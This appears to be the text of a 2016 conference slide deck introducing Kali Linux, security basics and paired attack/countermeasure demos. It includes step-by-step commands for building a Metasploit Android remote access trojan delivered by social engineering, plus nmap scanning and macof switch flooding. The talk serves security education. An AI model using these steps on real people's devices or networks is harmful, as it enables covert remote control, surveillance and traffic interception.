Offensive Security 
and Countermeasures 
using Kali Linux
Tony Bemus
Ohio Linux Fest 10/8/2016 
The information in this 
presentation is intended for
 educational use only. 
(Don't be evil) 
Techniques shown should only be
performed on your own network. 
Using these skills on a network without
Prior consent is illegal.

Offensive Security
"a proactive and adversarial approach to
protecting computer systems, networks
and individuals from attacks."
"The deployment of a set of security services to
protect against a security threat."

(Pen Testing)
(Security Control)
Cyber Security Considerations
  • Confidentiality
  • Integrity 
  • Availability
Maintaining and assuring the accuracy and 
completeness of data over its entire life-cycle.

The information must
    be available when it
         is needed

Keeping info hidden from
unauthorized people
using Encryption,
Two-factor auth,
Safeguard Keys, 
and Backups .
Basic Security Countermeasures
  • Install Antivirus / Anti-malware (Windows) 
  • Use a Password Manger (Last Pass/ KeyPassX) 
  • Use Strong and Unique Passwords
  • Install Security Patches and Updates
  • Automated Backups
  • Enable the Firewall
  • Don't Over Share on Social Media
  • Enable Drive Encryption

Advanced Penetration Testing Distribution
Funded and Maintained by Offensive Security
  • Debian based - Gnome 3
  • More then 600 Pen Testing Tools
  • ARMEL and ARMHF support
  • Previously known as BackTrack Linux
Kali Linux -
Kali Linux Options:
-all : All Available Packages in Kali Linux
-sdr : Software Defined Radio (SDR) Tools in Kali
-gpu : Kali Linux GPU-Powered Tools
-wireless : Wireless Tools in Kali
-web : Kali Linux WebApp Assessment Tools
-forensic : Kali Linux Forensic Tools
-voip : Kali Linux VoIP Tools
-pwtools : Kali Linux Password Cracking Tools
-top10 : Top 10 Kali Linux Tools
-rfid : Kali Linux RFID Tools

Kali Linux Top 10 tools
  • aircrack-ng - cracking wifi passwords
  • burpsuite - SQL injection research tool
  • hydra - online password cracking
  • john - password brute force attack 
  • maltego - research and recon
  • metasploit - exploit famework
  • nmap - Network scanner
  • zaproxy - finding vulnerabilities in web applications
  • sqlmap - detecting and exploiting SQL injection flaws 
  • wireshark - Network packet capture
Android RAT with MSF 
(Remote Access Trojan)    (Metasploit Framework)
Create a installable program 
     #msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R > OLF2016.apk
Send file to phone (social engineering needed - Email or post on website)
start msfconsole to accept the connection
search multi/handler
      #use exploit/multi/handler
Configure payload
      #set PAYLOAD android/meterpreter/reverse_tcp
set Options 
      #show options
      #set LHOST = IP
      #set LPort = 4444
to verify settings:
      #show options
Launch exploit 
wait for phone to connect

Install security patches 
Be vigilant on what is installed
Scan computers using nmap
Sweeping ping useing arp
     #nmap -sP -v -n IP_Range/24 > OLF-Scan1.txt

Scan specific computer useing UDP ICMP type 3, code 3  (unreachable) responce means
closed port, Otherwise assumed open,  Downfall is that a firewall that blocks the
response will report false positives.
     #nmap -sU -v -n IP_address > OLF-Scan2.txt

OS Fingerprinting
      #nmap -O -v �n IP_address > OLF-Scan3.txt
 Combine Scan with OS Fingerprint
      #nmap -A -sS -sU -v �n IP_address > OLF-Scan4.txt

Countermeasure - Enable a stateful firewall 
                                           Block ICMP packets
Network Sniffing with macof and Wireshark
Network switches forward packets only to the port 
where the intended mac address is located.   
Network Switches fail open when it crashes
Macof is a tool that will flood the switch with too many
mac address causing the switch to crash, thus fail open.
#macof -i interface
Once switch fails open then the attacker can sniff all
traffic over the wire using Wireshark 
Countermeasure - use port security 
     #switchport port-security

Contact me at:

Tony Bemus on Google+

@tbemus on twitter 
Advanced Penetration Testing Services - Offensive Security. (n.d.). Retrieved March 4, 2016,
Catalyst 4500 Series Switch Cisco IOS Software Configuration Guide, 12.2(25)EW -
    Configuring Port Security [Cisco Catalyst 4500 Series Switches] - Cisco. (n.d.). Retrieved March 8, 2016,
CISSP Domains | Information Security Certification from (ISC)�. (n.d.). Retrieved March 4, 2016,
Countermeasure (computer) - Wikipedia, the free encyclopedia. (n.d.-b). Retrieved March 7, 2016,
Guiding Principles in Information Security - InfoSec Resources. (n.d.). Retrieved March 4, 2016,
Information security - Wikipedia, the free encyclopedia. (n.d.). Retrieved March 4, 2016,
Kali Linux | Penetration Testing And Ethical Hacking Linux Distribution. (n.d.). Retrieved March 4, 2016,
Kali Metapackages | Penetration Testing Tools. (n.d.). Retrieved March 4, 2016,
NetSecNow. (n.d.). Kali Linux - Android Phone Hack. Retrieved
Use SQLMAP SQL Injection to hack a website and database in Kali Linux - darkMORE Ops. (n.d.). Retrieved March 8, 2016,
What is offensive security ? - Definition from (n.d.). Retrieved March 7, 2016,
Zaproxy | Penetration Testing Tools. (n.d.). Retrieved March 8, 2016,